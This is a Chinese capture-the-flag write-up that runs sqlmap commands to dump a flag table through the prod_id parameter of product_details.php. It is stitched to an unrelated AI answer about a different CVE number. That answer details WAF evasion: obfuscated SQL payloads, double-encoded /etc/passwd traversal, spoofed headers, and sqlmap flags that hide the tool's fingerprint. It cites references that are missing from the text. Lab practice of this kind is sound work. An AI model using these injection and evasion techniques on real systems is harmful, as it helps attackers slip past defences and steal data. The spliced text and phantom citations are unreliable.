【春秋云镜】CVE-2023-7106标靶Wp

文章讲述了如何使用SQL注入工具SQLmap对一个名为product_details.php的页面进行操作,包括获取当前数据库、查询库名、查找表并尝试获取Flag。作者展示了在prod_id参数下执行的一系列攻击步骤。

0x01:漏洞点

老样子先,看看标题介绍奥

ok了解到了 我们现在要知道参数是prod_id,路径为/pages/product_details.php

0x02:操作

直接打开SQLmap一把梭

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --current-db

这里的是查看数据库,奥

这里的话当前库是MySQL,后面实际测的时候那个库在electricks里面

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --dbs

这串就是查询库名

然后直接查询表

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks --tables

直接爆出来吧我的Flag!!!!!

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks -T flllaaaag --dump

<think>嗯,用户询问的是春秋靶场中"CVE-2023-7130"被拦截的原因及解决方法。这个编号看起来不太常见,需要谨慎验证。 从用户提供的引用材料来看,春秋平台主要复现各类Web漏洞,涉及SQL注入、目录遍历等问题。引用[3]提到靶场会设置安全机制拦截sqlmap等工具,这可能是关键线索。虽然用户提到的CVE编号在公开漏洞库中查不到,但编号格式接近2023年的漏洞,考虑可能是靶场自定义的模拟漏洞。 被拦截的可能原因主要有三个层面:首先是WAF规则,商业WAF会识别常见攻击特征;其次是靶机自身防护,比如引用[1]提到的参数过滤机制;最后是靶场平台限制,像引用[3]那样会检测扫描工具。 解决方法需要分层突破:对于WAF拦截,引用[4]展示的nginx绕过技术值得参考;靶机防护方面可借鉴引用[3]的sqlmap参数组合;如果遇到平台拦截,可能需要人工测试。特别要注意用户提到的编号可能是靶场内部编号,建议用户确认具体漏洞类型。 用户能精准引用四个漏洞资料,应该是具备一定渗透测试基础的。但要注意提醒漏洞编号的准确性,避免产生误导。最后补充建议时强调靶场环境与实际环境的差异,这样的回复会比较全面。 </think>关于春秋靶场中 **CVE-2023-7130** 被拦截的原因及解决方法,结合漏洞特征和靶场防护机制,分析如下: --- ### **被拦截的可能原因** 1. **WAF(Web应用防火墙)规则触发** 靶场通常部署WAF(如阿里盾、腾讯WAF),会检测以下特征: - **恶意负载特征**:若模拟攻击包含如 `UNION SELECT`、`SLEEP()`、`OR 1=1` 等SQL注入关键词,或 `../`、`/etc/passwd` 等路径遍历特征,会被规则库直接拦截。 - **异常流量模式**:高频请求、非常规HTTP方法(如PUT)、非常规Content-Type可能触发流量模型分析。 2. **靶机自身防护机制** - **输入过滤**:漏洞利用需构造特定参数(如 `id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--`),若靶机代码已修复过滤逻辑(如转义单引号),攻击会失效。 - **权限限制**:某些漏洞需特定会话状态(如管理员Cookie),若未正确模拟登录态,请求会被拒绝。 3. **靶场平台限制** - **扫描工具识别**:使用 `sqlmap` 等工具时,若未配置 `--random-agent` 或 `--proxy` 参数,其默认User-Agent会被识别并拦截(参考引用[^3])。 - **路径规范化绕过失败**:如Grafana漏洞利用需多层 `../` 绕过nginx路径清洗,构造不当会导致请求被标准化处理(参考引用[^4])。 --- ### **解决方法(分层绕过)** #### **1. 绕过WAF检测** - **混淆攻击载荷**: - SQL注入:改用 `/*!50000SELECT*/`(MySQL注释语法)、`CHAR()`编码字符串。 - 路径遍历:双重URL编码路径(如 `..%252f..%252fetc/passwd`)。 - **修改请求特征**: - 添加非常规HTTP头(如 `X-Forwarded-For: 127.0.0.1`)。 - 拆分攻击载荷到多个参数或Cookie中。 - **降低扫描速度**:在工具中设置延迟参数(如sqlmap的 `--delay=2`)。 #### **2. 适应靶机防护** - **精准漏洞验证**: - 确认漏洞利用点是否与引用[^1][^2]一致,例如检查 `/admin/suppliers/view_details.php?id=` 参数是否存在。 - 先用简单载荷测试(如 `id=1'` 观察报错)。 - **模拟合法会话**: - 捕获登录后的Cookie或Token,在攻击请求中附带(参考引用[^3])。 #### **3. 绕过靶场限制** - **工具配置优化**: ```bash sqlmap -u "http://target.com/vuln?id=1" --proxy=http://127.0.0.1:8080 --random-agent --batch --cookie="PHPSESSID=abc123" ``` - `--proxy`:通过Burp Suite代理观察请求是否被篡改。 - `--random-agent`:伪装浏览器UA避免工具指纹识别(参考引用[^3])。 - **手动构造请求**: 使用Burp Repeater手动测试,逐步调整载荷(如替换空格为 `/**/`)。 --- ### **排查建议流程** ```mermaid graph LR A[拦截现象] --> B{查看响应代码} B -->|403/406| C[触发WAF规则] B -->|500| D[靶机未解析载荷] C --> E[混淆攻击载荷] D --> F[检查语法有效性] F -->|语法错误| G[修正特殊字符] F -->|语法正确| H[验证漏洞存在性] ``` --- ### **注意事项** 1. CVE编号 **CVE-2023-7130** 暂未在官方漏洞库(如NVD)中收录,需确认是否为靶场自定义漏洞编号。 2. 靶场环境可能存在**时间限制**或**访问频率控制**,高频请求会触发临时封禁。 3. 若仍失败,尝试更换漏洞利用链(如结合文件上传+目录遍历,参考引用[^2][^4])。 > **提示**:春秋靶场通常模拟真实环境防护,需综合运用混淆、代理、会话维持等技术。建议先用低危操作(如时间延迟注入)验证漏洞可行性,再逐步深入[^1][^3]。 --- ### 相关问题 1. 如何判断WAF拦截规则并针对性绕过? 2. 在无工具情况下如何手动验证SQL注入漏洞? 3. 靶场中常见的权限维持方法有哪些? 4. 如何区分漏洞修复失败和攻击载荷构造错误? [^1]: 采购订单系统SQL注入漏洞分析 [^2]: Struts2文件上传漏洞利用链 [^3]: SQLMap绕过靶场检测的实战参数 [^4]: Nginx路径规范化绕过技巧
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值